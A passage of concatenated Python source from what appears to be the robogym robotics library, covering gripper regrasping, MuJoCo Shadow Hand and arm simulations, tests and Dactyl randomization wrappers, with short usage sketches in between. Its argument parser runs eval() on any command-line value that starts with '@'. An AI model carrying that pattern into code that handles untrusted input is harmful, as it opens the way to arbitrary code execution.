assert self.second_prev_action is not None
self.regrasp_command = self.second_prev_action
# now print debug information so that we know that we are regrasping (if debug is required)
if self.debug_regrasp:
print(
f"user wants to : {self.debug_dir_to_string(position_control[0])}"
)
print(f"gripper is : {self.debug_dir_to_string(obs_direction)}")
self.debug_print_regrasp_history()
print("This is an undesired opening!! Enabling re-grasp:")
print(
f"We would like to keep {self.prev_obs_position}, and will reissue {self.regrasp_command} for it"
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 4) Compare re-grasping command to what the user wants to do
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# if we have a re-grasp command, we will keep it if it's better than the user one
if self.regrasp_command is None:
returned_control = default_control
else:
# check if the user command is better, and if so update regrasp to the new command
user_is_better = default_control[0] > self.regrasp_command[0]
if user_is_better:
if self.debug_regrasp:
print(
f"The user command {default_control} is better than {self.regrasp_command}, will update it."
)
self.regrasp_command = default_control
returned_control = self.regrasp_command
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# 5) Update cached values to help next frame make the re-grasp decision
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
command_direction = (
None
if np.allclose(position_control, 0, atol=1e-5)
else np.sign(position_control)
)
# user trajectory
if command_direction != 0.0:
self.last_nonzero_cmd_direction = command_direction
# observations and observation trajectory
self.prev_obs_position = current_position
if obs_direction != 0.0:
self.last_nonzero_obs_direction = obs_direction
# actual actions that are returned
self.second_prev_action = self.prev_action
self.prev_action = returned_control
# update history only if we are debugging
if self.debug_regrasp:
self.debug_add_to_history(
self.debug_desired_action_history, position_control[0]
)
self.debug_add_to_history(
self.debug_desired_action_dir_history,
self.debug_dir_to_string(command_direction),
)
self.debug_add_to_history(
self.debug_observed_pos_history, current_position[0]
)
self.debug_add_to_history(
self.debug_observed_pos_dir_history,
self.debug_dir_to_string(obs_direction),
)
self.debug_add_to_history(
self.debug_returned_ctrl_history, returned_control[0]
)
return returned_control
```
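A hedged sketch of how the helper above might be driven from a gripper controller. The commands and joint readings below are made-up numbers; in the real controller they would come from the action pipeline and the simulation:
```python
import numpy as np

from robogym.robot.gripper.mujoco.regrasp_helper import RegraspHelper

helper = RegraspHelper(initial_position=np.array([0.0]))

# (desired position control, denormalized default control, observed joint position)
ticks = [
    (np.array([0.2]), np.array([0.2]), np.array([0.02])),  # closing
    (np.array([0.2]), np.array([0.2]), np.array([0.05])),  # still closing
    (np.array([0.0]), np.array([0.0]), np.array([0.04])),  # neutral cmd, gripper opens -> backdrive
]
for position_control, default_control, current_position in ticks:
    ctrl = helper.compute_regrasp_control(position_control, default_control, current_position)

# On the last tick the helper re-issues the earlier closing command instead of
# passing the neutral control through.
assert np.allclose(ctrl, [0.2])
```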
#### File: shadow_hand/mujoco/mujoco_shadow_hand.py
```python
import numpy as np
from mujoco_py.generated import const
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.shadow_hand.hand_forward_kinematics import (
FINGERTIP_SITE_NAMES,
REFERENCE_SITE_NAMES,
get_relative_positions,
)
from robogym.robot.shadow_hand.hand_interface import ACTUATORS, Hand, Observation
from robogym.robot.shadow_hand.hand_utils import (
denormalize_by_limit,
normalize_by_limits,
)
from robogym.robot.shadow_hand.mujoco.parameter_manager import MuJoCoParameterManager
class MuJoCoObservation(Observation):
""" Shadow Hand observation coming from the MuJoCo simulation """
def __init__(
self, simulation: SimulationInterface, hand_prefix: str, joint_group: str
):
fingers = np.array(
[
simulation.mj_sim.data.get_site_xpos(hand_prefix + site)
for site in FINGERTIP_SITE_NAMES
]
)
reference = np.array(
[
simulation.mj_sim.data.get_site_xpos(hand_prefix + site)
for site in REFERENCE_SITE_NAMES
]
)
self._fingertip_positions = get_relative_positions(fingers, reference)
self._joint_positions = simulation.get_qpos(joint_group).copy()
self._joint_vel = simulation.get_qvel(joint_group).copy()
self._time = simulation.mj_sim.data.time
self._force_limits = simulation.mj_sim.model.actuator_forcerange.copy()
self._actuator_force = normalize_by_limits(
simulation.mj_sim.data.actuator_force, self._force_limits
)
def joint_positions(self) -> np.ndarray:
return self._joint_positions
def joint_velocities(self) -> np.ndarray:
return self._joint_vel
def actuator_effort(self) -> np.ndarray:
return self._actuator_force
def timestamp(self) -> float:
return self._time
def fingertip_positions(self) -> np.ndarray:
return self._fingertip_positions
class MuJoCoShadowHand(Hand):
"""
MuJoCo interface to interact with robotic Shadow Hand
"""
def get_name(self) -> str:
return "unnamed-mujoco-shadowhand"
def __init__(
self, simulation: SimulationInterface, hand_prefix="robot0:", autostep=False
):
"""
:param simulation: simulation interface for the MuJoCo shadow hand xml
:param hand_prefix: Prefix to add to the joint names while constructing the MuJoCo simulation
:param autostep: When true, calls step() on the simulation whenever a control is set. This
should only be used when the MuJoCoShadowHand is being controlled without a
SimulationRunner in the loop.
"""
self.simulation = simulation
self.hand_prefix = hand_prefix
self.autostep = autostep
self.joint_group = hand_prefix + "hand_joint_angles"
self.simulation.register_joint_group(self.joint_group, prefix=hand_prefix)
self._parameter_manager = MuJoCoParameterManager(self.mj_sim)
assert self.mj_sim.model.nu == len(
ACTUATORS
), "Action space must have compatible shape"
# Are we in the joint control mode or in the force control mode?
self.joint_control_mode = True
self.force_limits = self.mj_sim.model.actuator_forcerange.copy()
# Store copies of parameters in the initial state
self.gainprm_copy = self.mj_sim.model.actuator_gainprm.copy()
self.biasprm_copy = self.mj_sim.model.actuator_biasprm.copy()
self.ctrlrange_copy = self.mj_sim.model.actuator_ctrlrange.copy()
def parameter_manager(self):
return self._parameter_manager
def actuator_ctrl_range_upper_bound(self) -> np.ndarray:
# We use control range in xml instead of constants to take into account
# ADR randomization for joint limit.
return self.mj_sim.model.actuator_ctrlrange[:, 1]
def actuator_ctrl_range_lower_bound(self) -> np.ndarray:
# We use control range in xml instead of constants to take into account
# ADR randomization for joint limit.
return self.mj_sim.model.actuator_ctrlrange[:, 0]
@property
def mj_sim(self):
""" MuJoCo MjSim simulation object """
return self.simulation.mj_sim
def set_position_control(self, control: np.ndarray) -> None:
assert self.is_position_control_valid(control), f"Invalid control: {control}"
if not self.joint_control_mode:
# Need to switch the motor parameters back to the joint (position) control
# state.
self.mj_sim.model.actuator_gaintype[:] = const.GAIN_USER
self.mj_sim.model.actuator_biastype[:] = const.BIAS_USER
self.mj_sim.model.actuator_gainprm[:] = self.gainprm_copy
self.mj_sim.model.actuator_biasprm[:] = self.biasprm_copy
self.mj_sim.model.actuator_ctrlrange[:] = self.ctrlrange_copy
self.joint_control_mode = True
self.mj_sim.data.ctrl[:] = control
if self.autostep:
self.mj_sim.step()
def set_effort_control(self, control: np.ndarray) -> None:
if self.joint_control_mode:
# Need to change the parameters of the motors
self.mj_sim.model.actuator_gaintype[:] = const.GAIN_FIXED
self.mj_sim.model.actuator_biastype[:] = const.BIAS_NONE
self.mj_sim.model.actuator_gainprm[:, 0] = 1.0
self.mj_sim.model.actuator_biasprm[:] = 0
self.mj_sim.model.actuator_ctrlrange[:] = np.array([[-1.0, 1.0]])
self.joint_control_mode = False
# Transform 0 and 1 into force limits
force_applied = denormalize_by_limit(control, self.force_limits)
self.mj_sim.data.ctrl[:] = force_applied
if self.autostep:
self.mj_sim.step()
def observe(self) -> Observation:
return MuJoCoObservation(self.simulation, self.hand_prefix, self.joint_group)
```
#### File: shadow_hand/mujoco/shadow_hand_simulation.py
```python
import numpy as np
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.shadow_hand.mujoco.mujoco_shadow_hand import MuJoCoShadowHand
class ShadowHandSimulation(SimulationInterface):
"""
MuJoCo simulation containing only the shadow hand
"""
# Robot hand xml
HAND_XML = "robot/shadowhand/main.xml"
# Just a floor
FLOOR_XML = "floor/basic_floor.xml"
# XML with default light
LIGHT_XML = "light/default.xml"
@classmethod
def build(
cls, n_substeps: int = 10, timestep: float = 0.008, name_prefix: str = "robot0:"
):
"""
Construct MjSim object for this simulation
:param name_prefix: prefix to append to names of all objects in the MuJoCo model of the hand;
by default "robot0:" is used.
"""
xml = MujocoXML()
xml.add_default_compiler_directive()
max_contacts_params = dict(njmax=2000, nconmax=200)
xml.append(
MujocoXML.parse(cls.FLOOR_XML).set_named_objects_attr(
"floor", tag="body", pos=[1, 1, 0]
)
)
xml.append(
MujocoXML.parse(cls.HAND_XML)
.add_name_prefix(name_prefix)
.set_objects_attr(tag="size", **max_contacts_params)
.set_objects_attr(tag="option", timestep=timestep)
.set_named_objects_attr(
f"{name_prefix}hand_mount",
tag="body",
pos=[1.0, 1.25, 0.15],
euler=[np.pi / 2, 0, np.pi],
)
.remove_objects_by_name(f"{name_prefix}annotation:outer_bound")
# Remove hand base free joint so that hand is immovable
.remove_objects_by_name(f"{name_prefix}hand_base")
)
xml.append(MujocoXML.parse(cls.LIGHT_XML))
return cls(sim=xml.build(nsubsteps=n_substeps), hand_prefix=name_prefix)
def __init__(self, sim, hand_prefix="robot0:"):
super().__init__(sim)
self.enable_pid()
self.shadow_hand = MuJoCoShadowHand(self, hand_prefix=hand_prefix)
```
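A minimal sketch of standing up the hand-only simulation defined above and reading the joint state, assuming MuJoCo and the robogym assets are installed:
```python
from robogym.robot.shadow_hand.mujoco.shadow_hand_simulation import ShadowHandSimulation

sim = ShadowHandSimulation.build(n_substeps=10, timestep=0.008)
hand = sim.shadow_hand  # MuJoCoShadowHand wired to this simulation
print(hand.observe().joint_positions())  # current joint angles of the simulated hand
```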
#### File: mujoco/simulation/base.py
```python
from robogym.envs.rearrange.common.utils import geom_ids_of_body
from robogym.mujoco.mujoco_xml import MujocoXML
from robogym.mujoco.simulation_interface import SimulationInterface
from robogym.robot.gripper.mujoco.mujoco_robotiq_gripper import MujocoRobotiqGripper
from robogym.robot.robot_interface import RobotControlParameters
class ArmSimulationInterface(SimulationInterface):
"""
Creates a SimulationInterface with a rearrange-compatible robot-gripper and a
table setup. Subclass this and implement make_objects_xml() to create other tasks.
"""
DEFAULT_RENDER_SIZE = 100
BASE_XML = "robot/ur16e/base.xml"
def __init__(
self, sim, robot_control_params: RobotControlParameters,
):
super().__init__(sim)
self.register_joint_group("robot", prefix=["robot0:"])
self.register_joint_group(
"gripper", prefix=["robot0:r_gripper", "robot0:l_gripper"]
)
self.control_param = robot_control_params
self.enable_pid()
# initialize a gripper in sim so that it can be used to sync state if we need to.
self._gripper = MujocoRobotiqGripper(
simulation=self, robot_control_params=robot_control_params, autostep=False
)
# Hide mocap since not very helpful and clutters vision.
mocap_id = self.mj_sim.model.body_name2id("robot0:mocap")
mocap_geom_start_id = self.mj_sim.model.body_geomadr[mocap_id]
mocap_geom_end_id = (
mocap_geom_start_id + self.mj_sim.model.body_geomnum[mocap_id]
)
for geom_id in range(mocap_geom_start_id, mocap_geom_end_id):
self.mj_sim.model.geom_rgba[geom_id, :] = 0.0
self.geom_ids = []
self.gripper_bodies = [
"robot0:gripper_base",
"left_gripper",
"left_inner_follower",
"left_outer_driver",
"right_gripper",
"right_inner_follower",
"right_outer_driver",
]
# Get the geom ids of all the bodies that make up the gripper
for gripper_body in self.gripper_bodies:
self.geom_ids.extend(geom_ids_of_body(self.mj_sim, gripper_body))
@classmethod
def build(
cls,
robot_control_params: RobotControlParameters,
n_substeps=40,
mujoco_timestep=0.001,
):
xml = cls.make_world_xml(
contact_params=dict(njmax=200, nconmax=200, nuserdata=200),
mujoco_timestep=mujoco_timestep,
)
xml = ArmSimulationInterface.make_robot_xml(xml, robot_control_params)
return cls(
xml.build(nsubsteps=n_substeps), robot_control_params=robot_control_params,
)
@classmethod
def make_world_xml(cls, *, contact_params: dict, mujoco_timestep: float, **kwargs):
return (
MujocoXML.parse(cls.BASE_XML)
.set_objects_attr(tag="option", timestep=mujoco_timestep)
.set_objects_attr(tag="size", **contact_params)
.add_default_compiler_directive()
)
@classmethod
def make_robot_xml(cls, xml, robot_control_params):
if robot_control_params.is_joint_actuated():
# Modifying xml is required because setting eq_active only was not enough to fully
# disable the mocap weld constraint. In my tests, setting eq_active to false would
# disable the constraint, but somehow the arm would not move when the joints were
# commanded. Removing from xml here seems to have the right effect.
xml.remove_objects_by_name("mocap_weld")
# Also add the actuations that are removed in the xml by default (since TCP does
# not need them).
joint_subdir = robot_control_params.arm_joint_calibration_path
xml.append(
MujocoXML.parse(
f"robot/ur16e/jointspec/calibrations/{joint_subdir}/ur16e_ik_class.xml"
)
)
xml.append(
MujocoXML.parse(
f"robot/ur16e/jointspec/calibrations/{joint_subdir}/joint_actuations.xml"
)
)
else:
# If not joint control mode or ik solver mode, use mocap defaults for joint parameters
xml.append(MujocoXML.parse("robot/ur16e/jointspec/ur16e_mocap_class.xml"))
# Add gripper actuators now (after joint actuators if required).
xml.append(MujocoXML.parse("robot/ur16e/gripper_actuators.xml"))
return xml
@property
def gripper(self):
return self._gripper
def render(
self,
width=DEFAULT_RENDER_SIZE,
height=DEFAULT_RENDER_SIZE,
*,
camera_name="vision_cam_front",
depth=False,
mode="offscreen",
device_id=-1,
):
data = super().render(
width=width,
height=height,
camera_name=camera_name,
depth=depth,
mode=mode,
device_id=device_id,
)
# original image is upside-down, so flip it
return data[::-1, :, :]
def get_gripper_table_contact(self) -> bool:
"""
Determine if any part of the gripper is touching the table by checking if there
is a collision between the table_collision_plane id and any gripper geom id.
"""
contacts = []
gripper_table_contact = False
# Sweep through all mj_sim contacts
for i in range(self.mj_sim.data.ncon):
c = self.mj_sim.data.contact[i]
            # Check if any of the contacts involve a gripper geom id; if so, append them to contacts:
if c.geom1 in self.geom_ids:
contacts.append(c.geom2)
elif c.geom2 in self.geom_ids:
contacts.append(c.geom1)
# Check if any of the contacts correspond to the `table` id:
for contact in contacts:
contact_name = self.mj_sim.model.geom_id2name(contact)
if contact_name == "table_collision_plane":
gripper_table_contact = True
return gripper_table_contact
```
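A minimal sketch of building the arm-and-gripper simulation above, rendering a frame, and checking for table contact. Constructing `RobotControlParameters()` with defaults is an assumption (the real callers pass explicit control settings), and the import path of `ArmSimulationInterface` is omitted because only a partial file path is shown here:
```python
from robogym.robot.robot_interface import RobotControlParameters

# ArmSimulationInterface is the class defined above (its import path is not shown here).
sim = ArmSimulationInterface.build(
    robot_control_params=RobotControlParameters(),  # default parameters; an assumption
    n_substeps=40,
)
frame = sim.render(width=100, height=100)      # RGB frame from "vision_cam_front"
touching = sim.get_gripper_table_contact()     # True if any gripper geom touches the table plane
```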
#### File: utils/tests/test_reach_helper.py
```python
import logging
import time
from typing import Union
import numpy as np
from robogym.robot.utils import reach_helper
from robogym.robot.utils.measurement_units import MeasurementUnit
from robogym.robot.utils.reach_helper import ReachHelperDebugRecorder
logger = logging.getLogger(__name__)
def assert_speed_is_ok(
_debug_recorder: ReachHelperDebugRecorder,
_expected_speed: Union[float, np.ndarray],
_speed_limit_threshold: Union[float, np.ndarray],
) -> None:
"""This function inspects the speed samples from the given recorder (for all controls), and asserts whether
all are within the desired speed limit.
:param _debug_recorder: Recorder to check velocity samples.
:param _expected_speed: Speed limit that we set in the reach helper for the command generation.
    :param _speed_limit_threshold: Small margin above the commanded speed that the robot may briefly
        exceed, since reaction time has a catch-up effect that can momentarily push the observed speed
        over the commanded value.
"""
# prepare speed limit
actuator_count = len(_debug_recorder.robot.actuators())
if np.isscalar(_expected_speed):
_expected_speed = np.full(actuator_count, _expected_speed)
if np.isscalar(_speed_limit_threshold):
_speed_limit_threshold = np.full(actuator_count, _speed_limit_threshold)
speed_limit = _expected_speed + _speed_limit_threshold
# compare observed vs limit
max_obs_speed_per_control = np.max(np.abs(_debug_recorder.obs_vel), axis=0)
limit_ok_per_control = max_obs_speed_per_control < speed_limit
was_speed_ok = np.alltrue(limit_ok_per_control)
# assert/print relevant info
random_id = str(time.time())
if not was_speed_ok:
logger.info(
"Speed limit violation, will dump plots of the samples for debugging:"
)
for act_idx in range(len(_debug_recorder.obs_pos[0])):
_debug_recorder.plot_pos_and_vel_for_actuator(
act_idx,
reach_helper.PlotOutput.FILE,
MeasurementUnit.RADIANS,
MeasurementUnit.DEGREES,
f"test_reach_helper_{random_id}",
)
assert (
was_speed_ok
), f"Speed limit violation: \n{max_obs_speed_per_control} \nvs \n{speed_limit}"
def _build_reach_helper_test_robot(max_position_change=0.020):
from gym.envs.robotics import utils
from robogym.envs.rearrange.simulation.blocks import (
BlockRearrangeSim,
BlockRearrangeSimParameters,
)
from robogym.robot.robot_interface import ControlMode, RobotControlParameters
sim = BlockRearrangeSim.build(
n_substeps=20,
robot_control_params=RobotControlParameters(
control_mode=ControlMode.TCP_WRIST.value,
max_position_change=max_position_change,
),
simulation_params=BlockRearrangeSimParameters(),
)
# reset mocap welds if any. This is actually needed for TCP arms to move
utils.reset_mocap_welds(sim.mj_sim)
# extract arm since CompositeRobots are not fully supported by reach_helper
composite_robot = sim.robot
arm = composite_robot.robots[0]
arm.autostep = True
return arm
def test_curve_generation_two_steps() -> None:
"""This test is used to verify a bugfix. The bug was that if a target's distance is too close to the current
position (closer than the max speed), the curve would only generate one step for the actuator, and the step
would be for the current position, not for the target position. Bugfix: reach helper should generate at least
two steps.
"""
robot = _build_reach_helper_test_robot()
cur_pos = robot.observe().joint_positions()
# calculate the small step that was bugged
control_delta = robot.get_control_time_delta()
max_speed = np.deg2rad(60)
max_change_per_step = max_speed * control_delta
offset_that_was_bugged = max_change_per_step - np.deg2rad(
0.01
) # offset needs to be below max_change_per_step
position_threshold = offset_that_was_bugged - np.deg2rad(
0.01
) # threshold needs to be below the offset
assert position_threshold < offset_that_was_bugged
target_pos = cur_pos.copy()
target_pos[0] += offset_that_was_bugged
ret_i = reach_helper.reach_position(
robot,
target_pos,
speed_units_per_sec=max_speed,
position_threshold=position_threshold,
)
assert ret_i.reached
```
#### File: robogym/tests/test_robot_env.py
```python
import attr
from robogym.robot_env import build_nested_attr
def test_build_nested_attr():
@attr.s(auto_attribs=True)
class NestedParameters:
a: int = 0
b: int = 1
@attr.s(auto_attribs=True)
class Parameters:
nested: NestedParameters = build_nested_attr(NestedParameters)
@attr.s(auto_attribs=True)
class ParametersOverload(Parameters):
nested: NestedParameters = build_nested_attr(
NestedParameters, default=dict(a=2)
)
parameters = Parameters()
assert isinstance(parameters.nested, NestedParameters)
assert parameters.nested.a == 0
assert parameters.nested.b == 1
parameters = Parameters(nested={"a": 2})
assert isinstance(parameters.nested, NestedParameters)
assert parameters.nested.a == 2
assert parameters.nested.b == 1
parameters = ParametersOverload()
assert parameters.nested.a == 2
assert parameters.nested.b == 1
parameters = ParametersOverload(nested={"a": 3})
assert parameters.nested.a == 3
assert parameters.nested.b == 1
parameters = ParametersOverload(nested={"b": 3})
assert parameters.nested.a == 2
assert parameters.nested.b == 3
```
#### File: robogym/utils/parse_arguments.py
```python
import glob
import os
from robogym.worldgen.parser.normalize import normalize_value
def parse_arguments(argv):
"""
    Takes a list of arguments and splits it into plain arguments and a
    dictionary built from the arguments of the form key=value.
    Further, cleans the arguments (expands *, ~) and makes sure that if
    they refer to files, those files are local.
"""
argv = _expand_user_rewrite(argv)
argv = _expand_wildcard_rewrite(argv)
argv, kwargs = _extract_kwargs_rewrite(argv)
_eval_kwargs(kwargs)
names = argv
print("\nInferred:")
print("\tnames: %s" % " ".join(names))
print("\targuments: %s" % str(kwargs))
print("\n")
return names, kwargs
def _expand_wildcard_rewrite(argv):
"""
:param argv: list of values
    :return: values after the rewrite. If a value contains *, it is expanded to all matching files.
"""
ret = []
for arg in argv:
if "*" in arg:
new_name = glob.glob(arg)
assert len(new_name) > 0, (
'Couldn\'t find any expansion to the pattern "%s"' % arg
)
ret += new_name
else:
ret.append(arg)
return ret
def _expand_user_rewrite(argv):
"""
:param argv: list of values
:return: values after the rewrite. If value contains ~ then it's expanded to home directory.
"""
ret = []
for arg in argv:
if arg[0] == "~":
arg = os.path.expanduser(arg)
ret.append(arg)
return ret
def _extract_kwargs_rewrite(argv):
"""
    Splits the list into key=value style arguments and remaining plain arguments.
:param argv: list of values
    :return: arguments that don't look like key=value, and a dictionary built from the remaining ones.
"""
kwargs = {}
ret = []
for arg in argv:
if arg.find("=") > -1:
pos = arg.find("=")
key, value = arg[:pos], arg[pos + 1:]
kwargs[key] = normalize_value(value)
else:
ret.append(arg)
return ret, kwargs
def _eval_kwargs(kwargs):
"""
Evaluates values which are strings starting with `@`, e.g. "@[]" -> [].
:param kwargs: dictionary
:return: the same dictionary but with evaluated values
"""
for key, value in kwargs.items():
if isinstance(value, str) and value[0] == "@":
kwargs[key] = eval(value[1:])
```
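A quick sketch of what the helpers above produce for a mixed argument list. The exact coercion of values depends on `normalize_value`, so the concrete results in the comments are assumptions:
```python
names, kwargs = parse_arguments(["world.xml", "n_boxes=3", "extra=@[1, 2]"])
# names  -> ["world.xml"]             plain arguments, after ~ and * expansion
# kwargs -> {"n_boxes": 3,            assuming normalize_value coerces numeric strings
#            "extra": [1, 2]}         "@..." values are eval'd by _eval_kwargs
```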
#### File: robogym/wrappers/dactyl.py
```python
from collections import OrderedDict
import gym
import numpy as np
from robogym.robot.shadow_hand.hand_forward_kinematics import (
FINGERTIP_SITE_NAMES,
REFERENCE_SITE_NAMES,
)
from robogym.utils.sensor_utils import check_occlusion, occlusion_markers_exist
from robogym.wrappers import randomizations
class RandomizedPhasespaceFingersWrapper(randomizations.RandomizedBodyWrapper):
def __init__(self, env=None, fingertips_noise=0.003, reference_noise=0.001):
"""Randomize position of phasespace markers on fingers. Units in meters."""
super().__init__(env)
self._all_sites = [
(f"robot0:{name}", fingertips_noise) for name in FINGERTIP_SITE_NAMES
]
self._all_sites += [
(f"robot0:{name}", reference_noise) for name in REFERENCE_SITE_NAMES
]
def _get_observation_space_delta(self, sim):
site_idxes = [
sim.model.site_name2id(f"robot0:{c}")
for c in FINGERTIP_SITE_NAMES + REFERENCE_SITE_NAMES
]
return OrderedDict(
[("randomized_phasespace", sim.model.site_pos[site_idxes, :].shape)]
)
def _get_field(self, sim):
orig_pos = [None for _ in self._all_sites]
for idx, (name, noise) in enumerate(self._all_sites):
sensor_idx = sim.model.site_name2id(name)
orig_pos[idx] = sim.model.site_pos[sensor_idx, :].copy()
return np.array(orig_pos)
def _set_field(self, sim):
randomized_phasespace = []
for idx, (name, noise) in enumerate(self._all_sites):
sensor_idx = sim.model.site_name2id(name)
sim.model.site_pos[sensor_idx, :] = self._orig_value[
idx
] + self.unwrapped._random_state.uniform(-noise, noise, size=(3,))
randomized_phasespace.append(sim.model.site_pos[sensor_idx, :])
randomized_phasespace = np.array(randomized_phasespace, copy=True)
return OrderedDict([("randomized_phasespace_fingers", randomized_phasespace)])
class FingersOccludedPhasespaceMarkers(gym.ObservationWrapper):
def __init__(self, env):
"""Make phasespace markers disappear when the occlusion detectors have collision,
which is simulated by returning old phasespace values.
This relies on `RandomizeObservationWrapper` with "fingertip_pos" in the input
"levels".
"""
super().__init__(env)
self._key = "noisy_fingertip_pos"
self._n_markers = 5
self._obs_buffer = None
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
self._occlusion_markers_exist = occlusion_markers_exist(self.unwrapped.sim)
assert len(obs[self._key]) % 3 == 0
assert len(obs[self._key]) // 3 == self._n_markers
self._obs_buffer = obs[self._key].copy()
return obs
def observation(self, observation):
if not self._occlusion_markers_exist:
return observation
else:
new_observation = OrderedDict()
for key in observation:
new_observation[key] = observation[key]
# Freeze the fingertip_pos read if the finger is occluded.
is_occluded_list = check_occlusion(self.unwrapped.sim)
for i, is_occluded in enumerate(is_occluded_list):
if not is_occluded:
self._obs_buffer[3 * i: 3 * (i + 1)] = observation[self._key][
3 * i: 3 * (i + 1)
]
new_observation[self._key] = self._obs_buffer.copy()
self._obs_buffer = new_observation[self._key].copy()
return new_observation
class FingersFreezingPhasespaceMarkers(randomizations.FreezingPhasespaceMarkers):
def __init__(
self,
env=None,
key="noisy_fingertip_pos",
disappear_p_1s=0.2,
freeze_scale_s=1.0,
):
super().__init__(
env, key=key, disappear_p_1s=disappear_p_1s, freeze_scale_s=freeze_scale_s
)
class FingerSeparationWrapper(gym.Wrapper):
""" Immobilize and separate all fingers other than active finger. """
def __init__(self, env, active_finger):
super().__init__(env)
self.active_finger = active_finger
self.FINGERS = ("TH", "FF", "MF", "RF", "LF", "WR")
def reset(self, *args, **kwargs):
# Spreads fingers apart
finger_i = self.FINGERS.index(self.active_finger)
for i in range(len(self.FINGERS)):
if "F" in self.FINGERS[i] and i != finger_i:
if i < finger_i:
limit = 0
elif i > finger_i:
limit = 1
self._freeze_joint("{}J4".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J3".format(self.FINGERS[i]), limit)
self._freeze_joint("{}J2".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J1".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J0".format(self.FINGERS[i]), 1)
if "TH" in self.FINGERS[i] and i != finger_i:
self._freeze_joint("{}J4".format(self.FINGERS[i]), 0)
self._freeze_joint("{}J3".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J2".format(self.FINGERS[i]), 1)
self._freeze_joint("{}J1".format(self.FINGERS[i]), 0)
self._freeze_joint("{}J0".format(self.FINGERS[i]), 0)
return self.env.reset(*args, **kwargs)
def _freeze_joint(self, joint_name, limit):
if limit == 0:
diff = -0.01
else:
diff = 0.01
model = self.env.unwrapped.sim.model
if "robot0:" + joint_name in model.joint_names:
joint_id = model.joint_name2id("robot0:" + joint_name)
model.jnt_range[joint_id, limit] = (
model.jnt_range[joint_id, 1 - limit] + diff
)
class RandomizedRobotDampingWrapper(randomizations.RandomizedDampingWrapper):
def __init__(self, env=None, damping_range=[1 / 1.5, 1.5], robot_name="robot0"):
joint_names = [
name
for name in env.unwrapped.sim.model.joint_names
if name.startswith(robot_name + ":")
]
super().__init__(env, damping_range, joint_names)
class RandomizedRobotKpWrapper(randomizations.RandomizedKpWrapper):
def __init__(self, env=None, kp_range=[0.5, 2.0], robot_name="robot0"):
actuator_names = [
name
for name in env.unwrapped.sim.model.actuator_names
if name.startswith(robot_name + ":")
]
super().__init__(env, kp_range, actuator_names)
class FixedWristWrapper(gym.Wrapper):
def __init__(self, env=None, wrj0_pos=0.0):
self.wrj0_pos = wrj0_pos
super().__init__(env)
def reset(self, *args, **kwargs):
return self.env.reset(*args, **kwargs)
def step(self, action):
a_wrj0_id = self.env.unwrapped.sim.model.actuator_name2id("robot0:A_WRJ0")
ctrlrange = self.env.unwrapped.sim.model.actuator_ctrlrange[a_wrj0_id]
actuation_range = (ctrlrange[1] - ctrlrange[0]) / 2.0
joint_pos = self.env.unwrapped.sim.data.get_joint_qpos("robot0:WRJ0")
action[a_wrj0_id] = (self.wrj0_pos - joint_pos) / actuation_range
return self.env.step(action)
class RewardObservationWrapper(gym.Wrapper):
def __init__(self, env=None, reward_inds=None):
super().__init__(env)
self.reward_inds = reward_inds
self.shape = (len(reward_inds),) if reward_inds is not None else (1,)
env.observation_space.spaces["reward"] = gym.spaces.Box(
low=-np.inf, high=np.inf, shape=self.shape, dtype=np.float32
)
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
return self.observation(obs, None)
def observation(self, observation, reward):
observation["reward"] = self._reward_obs(reward)
return observation
def step(self, action):
ob, rew, done, info = self.env.step(action)
return self.observation(ob, rew), rew, done, info
def _reward_obs(self, reward):
if reward is None: # this should only be the case on reset
obs = np.zeros(self.shape)
else:
if (
self.reward_inds is None
): # This should only be the case when reward is a scalar
obs = np.array([reward])
else:
obs = np.array(reward[self.reward_inds])
return obs
DEFAULT_NOISE_LEVELS = {
"achieved_goal": {"uncorrelated": 0.001, "additive": 0.001},
}
```
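A minimal sketch of composing a few of the wrappers above around a hand environment. `make_env()` is a hypothetical factory; the wrapped env must expose `unwrapped.sim` for the randomization wrappers to work:
```python
env = make_env()  # hypothetical: returns a robogym hand environment
env = RandomizedRobotDampingWrapper(env, damping_range=[1 / 1.5, 1.5], robot_name="robot0")
env = RandomizedRobotKpWrapper(env, kp_range=[0.5, 2.0], robot_name="robot0")
env = FixedWristWrapper(env, wrj0_pos=0.0)
obs = env.reset()
```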
#### File: robogym/wrappers/util.py
```python
import enum
from collections import OrderedDict
from copy import deepcopy
import gym
import numpy as np
from gym.spaces import Box, Dict
def update_obs_space(env, delta):
spaces = env.observation_space.spaces.copy()
for key, shape in delta.items():
spaces[key] = Box(-np.inf, np.inf, (np.prod(shape),), np.float32)
return Dict(spaces)
class BinSpacing(enum.Enum):
"""
    An Enum class to generate action bin spacing arrays.
"""
LINEAR = "linear"
EXPONENTIAL = "exponential" # Exponential binning. Expects a symmetric action space centered around zero
def get_bin_array(self, lower_bound, upper_bound, n_bins) -> np.ndarray:
if self is BinSpacing.LINEAR:
return np.linspace(lower_bound, upper_bound, n_bins)
else:
assert (
lower_bound == -upper_bound and n_bins % 2 == 1
), "Exponential binning is only supported on symmetric action space with an odd number of bins"
half_range = np.array([2 ** (-n) for n in range(n_bins // 2)]) * lower_bound
return np.concatenate([half_range, [0], -half_range[::-1]])
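# Worked example (a sketch): BinSpacing.EXPONENTIAL with lower_bound=-1.0, upper_bound=1.0
# and n_bins=5 gives half_range = [2**0, 2**-1] * -1.0 = [-1.0, -0.5], so the bins are
# [-1.0, -0.5, 0.0, 0.5, 1.0]; larger odd n_bins pack the additional bins around zero.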
class DiscretizeActionWrapper(gym.ActionWrapper):
"""
A wrapper that maps a continuous gym action space into a discrete action space.
"""
# default action bins for DiscretizeActionWrapper
DEFAULT_BINS = 11
def __init__(
self, env=None, n_action_bins=DEFAULT_BINS, bin_spacing=BinSpacing.LINEAR
):
"""
n_action_bins: can be int or None
if None is passed, then DEFAULT_BINS will be used.
"""
super().__init__(env)
assert isinstance(env.action_space, Box)
self._disc_to_cont = []
if n_action_bins is None:
